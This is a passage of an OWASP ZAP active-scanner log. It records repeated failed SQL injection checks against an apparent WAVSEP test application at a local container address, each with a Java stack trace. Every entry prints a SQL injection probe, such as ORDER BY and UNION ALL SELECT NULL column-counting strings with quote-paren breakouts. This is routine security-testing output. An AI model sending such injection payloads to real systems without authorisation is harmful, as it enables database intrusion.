Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682197 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 9776-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 9776-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682198 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682199 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682200 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682200 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682201 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682202 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682203 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 7443-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 7443-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682204 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682205 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682205 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682206 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at 